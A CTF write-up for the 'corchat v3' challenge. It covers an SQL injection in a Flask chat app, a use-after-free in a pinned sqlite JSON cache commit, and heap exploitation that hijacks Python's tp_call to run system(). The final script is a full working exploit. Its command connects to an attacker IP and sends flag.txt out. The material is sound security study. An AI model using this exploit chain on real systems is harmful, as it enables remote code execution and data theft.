corchat v3

Introduction

corchat v3 was one of the (many) brainfuck pwn challenges from this CTF, and was the challenge I focused on during the event (gotta get that $50). Unfortunately I didn't solve it during the event, and someone beat me to it anyways. I did however manage to figure out most of how it worked after the event (with some reference to the author's solution). Anyway, let's jump in.

Reversing

As the name implies, the target is a chatting application, which we're given the following source code for:

from flask import Flask, request, g, render_template, redirect
from flask_socketio import SocketIO
import sqlite3

app = Flask(__name__)
socketio = SocketIO(app)
app.config["DATABASE"] = "chat.db"

def get_db():
    db = getattr(g, '_database', None)
    if db is None:
        db = g._database = sqlite3.connect(app.config['DATABASE'])
    return db

@app.teardown_appcontext
def close_connection(exception):
    db = getattr(g, '_database', None)
    if db is not None:
        db.close()

@app.route("/")
def index():
    return redirect("/chatroom")

@app.route("/chatroom", methods=["GET"])
def chatroom():
    return render_template("chatroom.html")

@app.route("/send_message", methods=["POST"])
def post_new_message():
    message = request.form.get("msg")
    if message == None or len(message) == 0:
        return "Invalid request"

    db = get_db()
    s = f"INSERT INTO messages (message) VALUES ('{message}')"
    db.cursor().execute(s)
    db.commit()

    data = {"msg": message}
    socketio.emit("recv_message", data)
    return "Success"

@socketio.on("connect")
def handle_new_connection():
    cursor = get_db().cursor()
    s = f"SELECT message FROM messages"
    cursor.execute(s)

    messages = cursor.fetchall()
    for message in messages:
        data = {"msg": message[0]}
        socketio.emit("recv_message", data, to=request.sid)

@socketio.on("new_message")
def handle_new_message(data):
    message = data["msg"]
    if message == None or len(message) == 0:
        return

    db = get_db()
    s = f"INSERT INTO messages (message) VALUES ('{message}')"
    db.cursor().execute(s)
    db.commit()

    socketio.emit("recv_message", data)

if __name__ == "__main__":
    socketio.run(app, host="0.0.0.0", port=5000, debug=False)

The app is fairly simple:

  • A user can send a message (handled by handle_new_message), which is stored to a sqlite database using an INSERT statement.

  • A user connecting to the server (handled by handle_new_connection) will receive all the messages currently in the database.

SQL injection

The first vulnerability is fairly easy to spot:

s = f"INSERT INTO messages (message) VALUES ('{message}')"
db.cursor().execute(s)

When inserting the message into the database, it's inserted directly into the statement using string formatting, instead of something like prepared statements, without checking the contents of the message or escaping problematic characters. This is a classic SQL injection.
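To make the break-out concrete, here's a minimal sketch (the table layout mirrors the app's, and the payload is just for illustration) showing how a quote in the message escapes the string literal, and how a parameterized query would have avoided it:

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE messages (message TEXT)")

# A quote in the payload closes the string literal early, so the rest
# of the input is parsed as SQL (here, a UNION that inserts an extra row).
message = "x') UNION SELECT sqlite_version() --"
s = f"INSERT INTO messages (message) VALUES ('{message}')"
db.execute(s)  # inserts 'x' AND the sqlite version string
print(db.execute("SELECT message FROM messages").fetchall())

# With a parameterized query, the same input is stored verbatim.
db.execute("INSERT INTO messages (message) VALUES (?)", (message,))
```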

Unfortunately we can't use it for an RCE in this case, and it's not like the flag (or anything useful) is in the database. So what on earth is this useful for?

Where's the pwn?

The app is written in python, so it's not like the app itself can have any memory corruption bugs either. So what gives? Isn't this meant to be a pwn challenge???

Well, upon closer inspection of the Dockerfile, we notice something interesting.

RUN git clone https://github.com/sqlite/sqlite && \
    cd sqlite && \
    git checkout 66dacae4c3f818d0a9e94ecb4433c823a69a98aa && \
    ./configure && \
    make && \
    cp .libs/libsqlite3.so.0.8.6 /usr/lib/x86_64-linux-gnu/

While most of the installs are normal, this one stands out, because it's compiling its own very specific version of libsqlite3 from a commit hash. So, what if there was a vulnerability in this version of libsqlite3? Python's sqlite3 module doesn't implement all the logic itself; it reuses existing code from libraries like libsqlite3, so a vulnerability there would also be a vulnerability in python's sqlite3, and thus in our application. And since we have SQL injection, we can pass arbitrary SQL commands, so we'd have a decent amount of control in this hypothetical attack scenario.

Let's first look at this commit:

git clone https://github.com/sqlite/sqlite
cd sqlite
git checkout 66dacae4c3f818d0a9e94ecb4433c823a69a98aa
git log

Having a brief look at the current commit didn't ring any alarm bells. But what if there was a vulnerability that was reported and fixed in a later commit? Scrolling up to the next commit reveals something very appealing:

git log --reverse --all --ancestry-path ^HEAD

A potential UAF you say :eyes:. Commit faef28e6bd654e5061561423cb1ece6ca84f1f1f includes a patch for the issue:

@@ -2902,6 +2902,7 @@ static void jsonReplaceFunc(
   }
   pParse = jsonParseCached(ctx, argv[0], ctx, argc>1);
   if( pParse==0 ) return;
+  pParse->nJPRef++;
   for(i=1; i<(u32)argc; i+=2){
     zPath = (const char*)sqlite3_value_text(argv[i]);
     pParse->useMod = 1;
@@ -2914,6 +2915,7 @@ static void jsonReplaceFunc(
   jsonReturnJson(pParse, pParse->aNode, ctx, 1);
 replace_err:
   jsonDebugPrintParse(pParse);
+  jsonParseFree(pParse);
 }
 
 
@@ -2948,6 +2950,7 @@ static void jsonSetFunc(
   }
   pParse = jsonParseCached(ctx, argv[0], ctx, argc>1);
   if( pParse==0 ) return;
+  pParse->nJPRef++;
   for(i=1; i<(u32)argc; i+=2){
     zPath = (const char*)sqlite3_value_text(argv[i]);
     bApnd = 0;
@@ -2964,9 +2967,8 @@ static void jsonSetFunc(
   }
   jsonDebugPrintParse(pParse);
   jsonReturnJson(pParse, pParse->aNode, ctx, 1);
-
 jsonSetDone:
-  /* no cleanup required */;
+  jsonParseFree(pParse);
 }

At first glance, one can assume that there's a UAF occurring due to the pParse object's reference count not being incremented, causing it to be incorrectly freed. But what is this talk about a JSON parser cache spill?

We've also been given some test cases which would supposedly trigger the bug:

# 2023-10-09 https://sqlite.org/forum/forumpost/b25edc1d46
# UAF due to JSON cache overflow
#
do_execsql_test json101-22.1 {
  SELECT json_set(
    '{}',
    '$.a', json('1'),
    '$.a', json('2'),
    '$.b', json('3'),
    '$.b', json('4'),
    '$.c', json('5'),
    '$.c', json('6')
  );
} {{{"a":2,"b":4,"c":6}}}
do_execsql_test json101-22.2 {
  SELECT json_replace(
    '{"a":7,"b":8,"c":9}',
    '$.a', json('1'),
    '$.a', json('2'),
    '$.b', json('3'),
    '$.b', json('4'),
    '$.c', json('5'),
    '$.c', json('6')
  );
} {{{"a":2,"b":4,"c":6}}}

Let's try them out in the docker container.

And that right there, is the pwn we've been looking for.

sqlite3 and JSON

So at the moment we know there's a UAF in the json_set and json_replace functions, but what are these functions?

json_set takes a json object and key-value pairs, and assigns each pair to the json object (json[key] = value).

json_replace is similar, but only sets the value if the key exists in the object.

From what I could see, there doesn't seem to be a proper JSON object type in sqlite, rather they take and return strings representing JSON objects, which you can see in the test cases as well. This means they need to parse the JSON string every time it's used.
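This is easy to confirm from python (this assumes the local libsqlite3 ships the JSON functions, which any reasonably recent build does):

```python
import sqlite3

db = sqlite3.connect(":memory:")
# json_set consumes and produces plain TEXT, not a dedicated JSON type
row = db.execute("SELECT json_set('{}', '$.a', 1, '$.b', 2)").fetchone()
print(row[0], type(row[0]))  # {"a":1,"b":2} <class 'str'>
```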

For this writeup we'll focus on json_set, but note that you could most likely also do this challenge using json_replace (or json_insert).

json_set

json_set is implemented with jsonSetFunc (bet you didn't see that coming).

We see that a function called jsonParseCached is used to generate the pParse object we saw earlier. Based on the name, we can assume it parses the JSON string, but also keeps a cache to speed up parsing, which makes sense as a JSON string has to be parsed each time it's used. Also, the bug description mentioned a cache spill/overflow, so I wonder if this has anything to do with it. Foreshadowing is a literary device in wh-

After parsing the JSON it pretty much does what you'd expect:

  • Lookup the key to get the value pNode (if it doesn't exist a null slot is allocated by jsonLookup).

  • The value pNode is replaced by the new value with jsonReplaceNode.

You may have also noticed the bIsSet ? "set" : "insert", which is because this function also implements json_insert. We don't need to worry about the extra logic that this brings, as we don't use it here.

struct JsonParse

This is the type of the object pParse, which represents a parsing of the JSON string, not the typical JSON object you might be picturing with a list of key-value pairs or a hash table. Think of it more like an AST (Abstract Syntax Tree).

It stores the JSON string that the parse came from and a list of nodes in aNode, which can have multiple types:

  • OBJECT/ARRAY: These refer to {}/[] respectively, and store the total number of nodes contained in the object/array, which directly follow this object.

  • STRING/INT/REAL: These contain pointers into the main JSON string referring to the string/int/real, plus the length.

  • NULL: Represents a null.

jsonParseCached

jsonParseCached is a bit confusing at first, because there's a lot of logic relating to caching that we don't need to worry about too much (particularly regarding whether the JSON is allowed prior edits), so I'll just cover the essentials.

Since an sqlite object is passed, we need to extract the raw char* in zJson and the size in nJson.

Then it iterates through all the possible entries in the JSON parser cache. sqlite stores these in a singly linked list along with other auxiliary data allocations (accessed by sqlite3_get_auxdata). Since they're lumped in with other types of allocations, they're uniquely identified by giving them a set of keys that are only used by JSON parse objects, starting at JSON_CACHE_ID, and containing JSON_CACHE_SZ (4) keys.

If a slot is missing, it's marked using iMinKey, which is used later as the slot to store a new JsonParse object.

A slot can also be marked via iMinKey if its entry has been in the cache too long. This is tracked with the iHold field: the object with the lowest iHold will be removed, and new objects are given an iHold higher than that of any currently cached item.

It's easier to think of it like a FIFO queue: An object is inserted into the cache, and as more objects are inserted, the original one is pushed to the end, where it's eventually dequeued to make room for the next one.

A JSON string is matched to a cache entry typically by comparing the JSON strings using memcmp. There is more logic relating to this, but it's not that important for our purposes here.
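The caching behaviour described above can be sketched as a toy model (a conceptual sketch, not the real implementation; JSON_CACHE_SZ is 4 in the source, and matching is by string comparison):

```python
from collections import OrderedDict

JSON_CACHE_SZ = 4  # number of cache slots in the real code

class ToyParseCache:
    """Rough model of jsonParseCached: lookup by JSON string,
    FIFO-style eviction of the entry with the lowest iHold."""
    def __init__(self):
        self.entries = OrderedDict()  # zJson -> stand-in "JsonParse"

    def get(self, zjson):
        if zjson in self.entries:      # cache hit (memcmp match)
            return self.entries[zjson]
        parse = ("JsonParse", zjson)   # stand-in for a freshly parsed object
        if len(self.entries) >= JSON_CACHE_SZ:
            # evict (in the real code: jsonParseFree) the oldest entry
            self.entries.popitem(last=False)
        self.entries[zjson] = parse
        return parse

cache = ToyParseCache()
for s in ['{}', '1', '2', '3', '4']:
    cache.get(s)
print(list(cache.entries))  # '{}' has been pushed out of the queue
```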

Above is how a new JsonParse object is created if a cached one couldn't be found. While most of this isn't too important, there are some details which are interesting to note:

  • Line 1959: The reference count is set to 1.

  • Line 1963: This is a case where jsonParse failed, and there's a comment that the caller will own the new JsonParse object. If that's what happens in the case of an error, what happens normally?

  • Line 1971: We'll see that it's actually the cache that owns the object, not the caller. Hmmm...

  • Line 1972: The object is stored to the cache using sqlite3_set_auxdata, at iMinKey, with the destructor jsonParseFree. If it's replacing an entry that already exists, then the existing entry is freed using its destructor.

The destructor in question behaves how you might expect:

Decrements the reference count until it's 1, in which case free it.

This idea of the cache owning the object is also elaborated on in a comment above:

And if you remember the patch, it was jsonSetFunc incrementing the reference count itself, effectively also taking ownership of the object. So clearly something went wrong with this idea, and they seemingly had to backtrack a bit to fix it.

So to summarise:

  • JsonParse objects are cached in a queue of size 4.

  • It will attempt to find a cached entry before making a new one.

  • If one cannot be found, a new one will be made.

  • This new one is added to the queue, potentially forcing another existing entry out of the queue, causing it to be freed.

  • All entries belong to the cache and have a reference count of 1, which is left unchanged by jsonSetFunc and jsonReplaceFunc.

jsonReplaceNode

Let's have a closer look at how the value node is replaced in json_set. Remember that jsonSetFunc uses jsonLookup (exact details of how this works aren't important) to find a node for the value corresponding to the key, and if the key doesn't already exist, allocate a NULL node for the value of this new key, and use that.

The way replacing a node works is basically by allocating a SUBST node that references the node to be replaced, but the details of this aren't necessary here. Then there's a switch case depending on the type of the sqlite object, so it can handle each type separately. Let's look at the TEXT case.

There's a lot going on here, but it really comes down to 2 separate cases:

  • sqlite3_value_subtype(pValue) != JSON_SUBTYPE

  • sqlite3_value_subtype(pValue) == JSON_SUBTYPE

What does it mean for pValue to have JSON_SUBTYPE? Well, while there isn't a JSON object type per se, strings that came from JSON functions like json, json_set etc. are distinguished: they're marked as having the subtype JSON_SUBTYPE by jsonReturnJson, which is used by most of the JSON related functions.

So for example the string "hello world" would not be considered a JSON subtype, but json("hello world") would. And if you remember the test cases once again, they used strings in calls to json. Why is that important?
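The difference is easy to see from python (again assuming a libsqlite3 with the JSON functions): a plain TEXT value gets stored as a quoted JSON string, while a json(...) value is spliced in as structured JSON:

```python
import sqlite3

db = sqlite3.connect(":memory:")
plain  = db.execute("""SELECT json_set('{}', '$.a', '{"x":1}')""").fetchone()[0]
tagged = db.execute("""SELECT json_set('{}', '$.a', json('{"x":1}'))""").fetchone()[0]
print(plain)   # the TEXT value is quoted and escaped: {"a":"{\"x\":1}"}
print(tagged)  # the JSON_SUBTYPE value is inserted as an object: {"a":{"x":1}}
```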

Well, if we have a closer look at the JSON_SUBTYPE case:

There's a call to jsonParseCached, which would make sense, considering that it expects this to be a JSON string. Harmless, right?

The UAF

Well, let's go back to jsonParseCached. We know that it either returns a JsonParse from the cache, or creates a new one and adds it to the cache. Either way, a JsonParse from jsonParseCached will belong to the cache. That includes the original JsonParse all the way back in jsonSetFunc.

We also know that jsonParseCached can push old objects out of the cache, causing them to be freed using jsonParseFree. This could also include the original JsonParse from jsonSetFunc!

On its own this isn't a problem, but since the object only belongs to the cache, when jsonParseFree runs it sees a reference count of 1, assumes nothing else is using the object (only the cache is), and frees it!

But of course, it is in use, in jsonSetFunc, so this causes a UAF!

Walking this through with the (slightly modified) test case:

SELECT json_set(
    '{}',
    '$.a', json('1'),
    '$.b', json('2'),
    '$.c', json('3'),
    '$.d', json('4')
)
  1. All the json function calls are evaluated. These would just return the strings themselves, but they'd be marked as JSON_SUBTYPE. (They would be parsed and cached, but this doesn't affect much, except clear the previous cache).

  2. The '{}' would be parsed and cached by jsonParseCached, placing it at the back of the queue.

  3. The '$.a' key is looked up, and the null value would be replaced by '1'. Since it has JSON_SUBTYPE, it's parsed and cached, pushing '{}' 1 slot along.

  4. Repeat for '$.b' and '$.c'.

  5. By now, the original '{}' is at the end of the queue, so when '4' is parsed and cached, it forces '{}' to be dequeued and freed, resulting in a UAF.
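The whole walkthrough above can be replayed from python. Against the vulnerable build from the Dockerfile, this statement triggers the UAF (and typically a crash); on the patched libsqlite3 that most systems ship, it just returns the merged object:

```python
import sqlite3

db = sqlite3.connect(":memory:")
# Modified test case: four distinct keys, each value wrapped in json()
# so it gets JSON_SUBTYPE and a cache slot of its own.
row = db.execute("""
    SELECT json_set(
        '{}',
        '$.a', json('1'),
        '$.b', json('2'),
        '$.c', json('3'),
        '$.d', json('4')
    )
""").fetchone()
print(row[0])  # on a patched build: {"a":1,"b":2,"c":3,"d":4}
```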

So what now?

Right now we have the DoS the description mentioned; now for the RCE. But how?

Well first we need to control what happens right after the UAF is created to prevent a crash. So what happens next?

Well, after parsing the value that needs to be added to the object, it then needs to add the nodes corresponding to that value. It does this with jsonParseAddNodeArray.

Remember at this point, the pParse object has been freed, which would corrupt some of the first fields of the object, depending on what bin it was freed to. By debugging, we can verify that it (usually) gets freed to tcache.

I debugged it by following these instructions:

  1. Running python or python app.py

  2. Running gdbserver :9090 --attach $(pidof python3) in another shell

  3. Running gdb -> target remote 127.0.0.1:9090 in another another shell

Here we see it's been freed specifically to tcachebins[0x60], which makes sense since we're on glibc 2.31, plus the size of the JsonParse structure is 0x50 bytes (+ a few more from storing '{}'). And from the structure dump, we see that the tcache key (a pointer to tcache_perthread_struct) overlaps with aNode, which is a pointer to the list of nodes making up the JsonParse.

This is interesting, because now we're in jsonParseAddNodeArray, which is about to copy a new set of nodes to aNode if there's room, and if there isn't, it will realloc it.

Theoretically this could allow arbitrary control over tcache_perthread_struct, but there are a few problems currently:

  1. An array of JsonNodes isn't very good for controlling data, as we don't have much control over these. This means that not only is it bad for arbitrary control, but by clobbering tcache, it'll likely cause a crash in some malloc call.

  2. realloc'ing tcache to a smaller size also clobbers it, as a new size field will show up in the middle of tcache.

  3. nNode and nAlloc are also overwritten by the fd, so if there's a pointer overlapping this, these fields will be very large and likely result in a crash.

The 3rd problem can be fixed by using a spray to empty tcachebins[0x60] beforehand, that way the fd field will be NULL.

The 1st and 2nd problems we can solve by realloc'ing with a size larger than 0x290 (the size of tcache_perthread_struct). If a realloc call is passed a size larger than the current chunk's, and can't expand forward, it'll resort to just:

  1. malloc'ing a new, larger chunk.

  2. Copying over the data to the new chunk.

  3. free'ing the old chunk.

This would allow us to perform a House of Spirit attack on tcache_perthread_struct, and if we could allocate on top of that with controlled data, we can get an arbitrary write.
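The realloc grow-path can be poked at from python via ctypes (glibc-specific, and the addresses are whatever the allocator hands back, so no fixed output):

```python
import ctypes

# On Linux, loading the NULL library exposes the process's libc symbols.
libc = ctypes.CDLL(None)
libc.malloc.restype = ctypes.c_void_p
libc.malloc.argtypes = [ctypes.c_size_t]
libc.realloc.restype = ctypes.c_void_p
libc.realloc.argtypes = [ctypes.c_void_p, ctypes.c_size_t]
libc.free.argtypes = [ctypes.c_void_p]

p = libc.malloc(0x48)
libc.malloc(0x18)           # blocker: prevents in-place expansion of p
q = libc.realloc(p, 0x400)  # grow: malloc a new chunk, copy, free the old one
print(hex(p), hex(q))       # q lands at a different address
libc.free(q)
```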

Data Spraying

For this we'd need a way of spraying controlled data, and this is where I started to struggle, as I was unable to find such a primitive. It turns out the answer was held by another JSON function.

After the CTF, I saw that ryaagard (the challenge author) revealed how they were able to spray data.

This was rather annoying, because if I just kept looking at src/json.c I probably could've found it, but oh well.

json_extract takes a JSON string and a key, extracts the value corresponding to the provided key, and returns it. It's implemented by jsonExtractFunc, and the key part that makes this possible is jsonReturn.

Specifically, the JSON_STRING case when the string contains escape sequences (signified by jnFlags & JNODE_RAW == 0 && jnFlags & JNODE_ESCAPE != 0). Here it mallocs a chunk the same length as the escaped sequence, to ensure there's no possibility of an overflow (an escaped character is longer than the character it encodes), and then unescapes the sequence into it. This makes it very useful for a data spray, although you can't control every single byte of a "chunk" you allocate, since the malloc'ed size will be larger than the unescaped size.
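A small demonstration of the primitive, using a standard JSON \u escape (the exploit below also uses JSON5 \x escapes, which the challenge's sqlite build supports):

```python
import sqlite3

db = sqlite3.connect(":memory:")
# The \u0065 escape flags the string as JNODE_ESCAPE, so jsonReturn
# mallocs a fresh buffer and unescapes our chosen bytes into it.
row = db.execute(r"""SELECT json_extract('{"a":"sh\u0065ll"}', '$.a')""").fetchone()
print(row[0])  # shell
```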

We can also use this to spray tcachebins[0x60] to empty it.

To ensure these data sprays are preserved (i.e. not freed), we can use a sequence of SELECT json_extract(...) statements joined by UNION. I tried other ways of creating these sprays, such as string concatenation, or storing them in a list, but both of these methods failed, likely because the strings would only be needed temporarily, and thus be freed (e.g. when concatenating 2 strings, neither is needed again afterwards, as they make a new, longer string). UNION seems to keep them around however, perhaps because it only combines the results at the very end.

Smashing tcache

Let's put all of this together into a POC which overwrites tcache with junk.

from pwn import *
import string

request2size = lambda req: (req+0x17)&(~0xf) if req>=9 else 0x20
size2usable = lambda sz: sz-8

def escape_byte(c, force=False):
	charset = set(string.printable.encode())
	charset -= set(string.whitespace.encode() + b"'\"")
	if not force:
		if c == 0:
			return "\\0"
		elif c in charset:
			return chr(c)
	return "\\x"+format(c, "02x")

def escape(x):
	return "".join(map(escape_byte, x))

def malloc_escaped(escaped):
	# at least one character should be escaped to trigger the malloc
	assert "\\" in escaped
	return "SELECT json_extract('{a:\"%s\"}', '$.a')" % escaped

def spray(size, char="A"):
	assert size & 0xf == 0
	x = escape_byte(ord(char), force=True)
	x = x.ljust(size2usable(size)-2-1, char)
	return malloc_escaped(x)
	

# use json_extract with escaped strings to spray
to_spray = [
(0x60, 7),
(0x290, 7),
]
sprays = []
char = 0x41
for size, count in to_spray:
	for _ in range(count):
		sprays.append(spray(size, char=chr(char)))
		char += 1

malloc_tcache = spray(0x290, char="X")

long_list = "[" + ",".join(["null"]*0x30) + "]"
json = f"json_set('{{}}', '$.a', json('1'), '$.b', json('2'), '$.c', json('3'), '$.d', json('{long_list}'))"

statements = []
statements.extend(sprays)
statements.append("SELECT " + json)
statements.append(malloc_tcache)

injection = " UNION ".join(["aaaa')"] + statements) + "--"
print(injection)

statement = f"INSERT INTO messages (message) VALUES ('{injection}')"
print(f"db.cursor().execute({repr(statement)})")

We start off by spraying chunks to empty:

  • tcachebins[0x60]: This will be used for the UAF'ed chunk, so we need fd to be NULL.

  • tcachebins[0x290]: Ensure that when we free tcache_perthread_struct, it gets freed to tcache, which makes it easier to reallocate. We don't need to fully empty it (1 slot would work just fine), but we might as well, just to be sure we'll get a slot (plus nothing's stopping us).

Then we trigger the UAF using a modified version of the test case. The change is that we use a list longer than 0x29 elements, to ensure that its aNode array is bigger than 0x290 bytes (sizeof(JsonNode)=0x10), which forces realloc to free tcache_perthread_struct.

Finally we reclaim the allocation with a dummy.

We can test this as follows:

ctf@0ac532cec93d:/app$ python3
Python 3.8.10 (default, Mar 25 2024, 10:42:49) 
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import sqlite3
>>> db = sqlite3.connect("chat.db")
>>> db.cursor().execute(...)

Bingo!

Write what where

Now that we have control over tcache_perthread_struct, what can we do with that? ASLR is in place, and turning this into a leak wouldn't be possible, so is there anything we can target? Yes there is, because thankfully the python binary is compiled without PIE:

So what can we target here?

Well, one idea that I had was targeting the GOT, but this doesn't work for a very annoying reason: sqlite3_malloc. This is a wrapper around malloc that does some locking and memory tracking. Part of that memory tracking is counting how many total bytes have been malloc'ed, and to do this it uses malloc_usable_size.

So with our allocations we have to be careful: if we use a size that's too big (like an address) we'll get a crash, because part of determining the usable size is finding whether the next chunk's prev_inuse bit is set, so finding the next chunk based on a large size wanders into no man's land.

So GOT is a no-go. I also considered targeting a python class method. When a class method is called, it's typically done so with the first argument being the object itself (like a thiscall). So if we could write a command to the start of the object, then overwrite a class method with system@plt, we could get RCE. I didn't find a way to do this, especially since most objects are on the heap, which we can't access. And while there are some objects we can access in _PyRuntime, it's still not ideal, because we need a reverse shell command, which we can't fit inside 8 bytes (at offset +0x08 is the pointer to the class object).

So I conceded and looked at ryaagard's solution, and this is what I understood of it:

One gadgets in python?

The first trick used employed by ryaagard was PyMem_RawFree.

The PyMem_Raw set of allocation functions use a context object to store function handlers. It first loads the function into rax, and if it's some specific function (which is a no-op function):

Then it uses the regular free. Otherwise, it will jump to it, with the first argument being some object from the same context object. This is very appealing, because if we can smash this context object, then any call to it will execute an arbitrary function (like system@plt) with a controlled first argument (like a reverse shell). This effectively turns PyMem_RawFree into a constraintless one_gadget.

So we'll need 2 writes:

  • Write a reverse shell command into memory.

  • Smash the PyMem_Raw context.

Overwriting a class method

Now that we have a one_gadget, we can overwrite any class method, and if it's ever called, we'll get a reverse shell. ryaagard opted to overwrite PyFunction_Type, which is the object representing the python function type. It stores fields, like function pointers, which handle different functionalities of function objects. One of these is tp_call, which handles calling functions. This is an ideal target, because there will be many instances where a python function is called, and it takes just one of these calls to give us a reverse shell. However, by default tp_call isn't actually used, so we can't just overwrite it and call it a day. Let's have a closer look:

Searching for references of tp_call yields _PyObject_MakeTpCall:

Which, as you might expect, goes on to call the function:

All seems good, so where is this (and tp_call in general) used? The 2 main instances I found were:

Both of which are used by PyEval_CallObjectWithKeywords:

In both of these cases, we can see a common thread: _PyVectorcall_Function is used to determine whether or not to use tp_call. It seems like this has to return NULL for python to decide to use tp_call, so how do we do that?

It turns out that it checks for feature VECTORCALL, by checking the tp_flags field of the class, and seeing whether the _Py_TPFLAGS_HAVE_VECTORCALL (1<<11) flag is set. If it's disabled (i.e. flag isn't set), then it resorts to tp_call.
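We can sanity-check the flag from python itself (1<<11 matches _Py_TPFLAGS_HAVE_VECTORCALL in CPython 3.8; the bit kept the same position in later releases, where it's spelled Py_TPFLAGS_HAVE_VECTORCALL):

```python
HAVE_VECTORCALL = 1 << 11  # _Py_TPFLAGS_HAVE_VECTORCALL in CPython 3.8

def f():
    pass

# Function objects normally have the flag set, so tp_call is bypassed;
# the exploit zeroes tp_flags to force python down the tp_call path.
print(bool(type(f).__flags__ & HAVE_VECTORCALL))  # True
```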

We can determine, by looking at the _typeobject struct definition, that the offsets we need are:

  • 0x80: tp_call (= PyMem_RawFree)

  • 0xa8: tp_flags (= 0)

More crashes

We also have the problem of actually triggering tp_call. The snag is that at the end of executing the SQL statement, like a reasonable application that wants to avoid memory leaks (lame), sqlite frees all the memory it allocated previously, including our arbitrary allocations. When freeing these, the process will abort because they're obviously malformed "chunks", so we never actually reach the python part of the thread we corrupt, meaning our corrupted data isn't used by this thread.

Fortunately, the web application is multithreaded and all threads share the same memory, so while the current thread may abort, another thread may call a python function and hit our corrupted tp_call before the application aborts. So ideally we'd want to stall our thread from aborting, giving the application time to trigger our reverse shell.

While sqlite doesn't have any kind of SLEEP statement, we can use an SQL statement that takes a while to evaluate, a trick that's also commonplace in time-based SQL injections. So we can use something like the following:

SELECT 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(200000000/2))))
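A quick check of the delay from python (using a smaller blob than the exploit's so it finishes quickly; exact timing depends on the machine):

```python
import sqlite3
import time

db = sqlite3.connect(":memory:")
t0 = time.time()
# LIKE with no wildcards against a 2M-character hex string never matches,
# so the result is 0; the work of generating and hexing the blob is the stall.
row = db.execute(
    "SELECT 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(2000000/2))))"
).fetchone()
print(f"result={row[0]}, took {time.time() - t0:.3f}s")
```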

Solution

So, putting all of this together, we can finally produce the following exploit:

from pwn import *
import string

python = context.binary = ELF("python3.8")

IP, PORT = '[insert ip here]',9999

request2size = lambda req: (req+0x17)&(~0xf) if req>=9 else 0x20
size2usable = lambda sz: sz-8

def escape_byte(c, force=False):
	charset = set(string.printable.encode())
	charset -= set(string.whitespace.encode() + b"'\"")
	if not force:
		if c == 0:
			return "\\0"
		elif c in charset:
			return chr(c)
	return "\\x"+format(c, "02x")

def escape(x):
	return "".join(map(escape_byte, x))

def malloc_escaped(escaped):
	# at least one character should be escaped to trigger the malloc
	assert "\\" in escaped
	return "SELECT json_extract('{a:\"%s\"}', '$.a')" % escaped

def spray(size, char="A"):
	assert size & 0xf == 0
	x = escape_byte(ord(char), force=True)
	x = x.ljust(size2usable(size)-2-1, char)
	return malloc_escaped(x)
	

# use json_extract with escaped strings to spray
to_spray = [
(0x60, 7),
(0x290, 7),
]
sprays = []
char = 0x41
for size, count in to_spray:
	for _ in range(count):
		sprays.append(spray(size, char=chr(char)))
		char += 1

def pad_to_size(escaped, sz):
	return escaped + "\\x00" * ((sz-0x10-len(escaped))//4)

def malloc(data, sz):
	data = escape(data)
	assert request2size(len(data)+2+1) <= sz
	data = pad_to_size(data, sz)
	return malloc_escaped(data)

tcache = {}

# put cmd in memory

# 0x93d900 <_PyRuntime+672>
scratch = 0x93d900

sz = 0x100
cmd = f"python3 -c \"import socket;s=socket.socket();s.connect(('{IP}',{PORT}));s.send(open('flag.txt','rb').read());s.close()\""
cmd = cmd.encode() + b"\x00"
malloc_cmd = malloc(cmd, sz)

tcache[sz] = scratch

# overwrite _PyMem_RawFree

sz = 0x70
pymem_overwrite = flat({
	0x00: scratch,
	0x20: python.plt.system,
})
malloc_pymem_overwrite = malloc(pymem_overwrite, sz)

tcache[sz] = 0x90b5e0

# overwrite PyFunction_Type->tp_call

sz = 0x80
# we need to allocate 0x10 bytes earlier to prevent a musable() crash
tpcall_overwrite = flat({
	0x10: python.sym.PyMem_RawFree,		# tp_call
	0x38: 0								# tp_flags
})
malloc_tpcall_overwrite = malloc(tpcall_overwrite, sz)

tcache[sz] = 0x8fba30	# PyFunction_Type+112

# construct tcache

tcache_sizes = b""
tcache_ptrs = b""
for sz in range(0x20, 0x420, 0x10):
	if sz in tcache:
		tcache_sizes += p16(1)
		tcache_ptrs += p64(tcache[sz])
	else:
		tcache_sizes += p16(0)
		tcache_ptrs += b"X"*8
tcache = tcache_sizes + tcache_ptrs
tcache = escape(tcache)[:0x280]
malloc_tcache = malloc_escaped(tcache)

long_list = ("[" + ",".join(["null"]*0x30)) + "]"
json = f"json_set('{{}}', '$.a', json('1'), '$.b', json('2'), '$.c', json('3'), '$.d', json('{long_list}'))"

statements = []
statements.extend(sprays)
statements.append("SELECT " + json)
statements.append(malloc_tcache)
statements.append(malloc_cmd)
statements.append(malloc_pymem_overwrite)
statements.append(malloc_tpcall_overwrite)
statements.append("SELECT 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(200000000/2))))")

injection = " UNION ".join(["aaaa')"] + statements) + "--"
print(injection)

To receive the reverse shell I chose to spin up a digitalocean instance and set up a netcat listener. Let's fire away!

Last updated